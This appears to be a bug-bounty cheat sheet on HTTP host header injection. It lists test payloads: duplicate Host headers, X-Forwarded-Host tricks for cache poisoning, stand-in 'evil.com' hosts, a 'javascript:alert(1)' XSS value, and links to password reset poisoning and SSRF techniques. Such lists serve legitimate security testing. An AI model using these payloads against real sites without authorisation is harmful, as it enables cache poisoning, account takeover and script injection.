CWE-644: Improper Neutralization of HTTP Headers
Web cache poisoning via ambiguous requestsarrow-up-right
Password reset poisoningarrow-up-right
Add two HOST: in Request.
HOST:
Try localhostarrow-up-right
Try this Headers
If you come across /api.json in any AEM instance during bug hunting, try for web cache poisoning via followingHost: , X-Forwarded-Server , X-Forwarded-Host: and or simply try https://localhost/api.jsonarrow-up-right HTTP/1.1
/api.json
Host: , X-Forwarded-Server , X-Forwarded-Host:
Also try Host: redacted.com.evil.com
Host: redacted.com.evil.com
Try Host: evil.com/redacted.comarrow-up-right https://hackerone.com/reports/317476arrow-up-right
Try this too Host: example.com?.mavenlink.com
Host: example.com?.mavenlink.com
Try Host: javascript:alert(1); Xss payload might result in debugging mode. https://blog.bentkowski.info/2015/04/xss-via-host-header-cse.htmlarrow-up-right
Host: javascript:alert(1);
Host Header to Sqli https://blog.usejournal.com/bugbounty-database-hacked-of-indias-popular-sports-company-bypassing-host-header-to-sql-7b9af997c610arrow-up-right
Bypass front server restrictions and access to forbidden files and directories through
Add line wrapping
Supply an absolute URL
Web cache poisoningarrow-up-right
Exploiting classic server-side vulnerabilitiesarrow-up-right
Bypassing authenticationarrow-up-right
Virtual host brute-forcingarrow-up-right
Routing-based SSRFarrow-up-right
Connection state attacksarrow-up-right
PortSwiggerarrow-up-right
Last updated 1 year ago
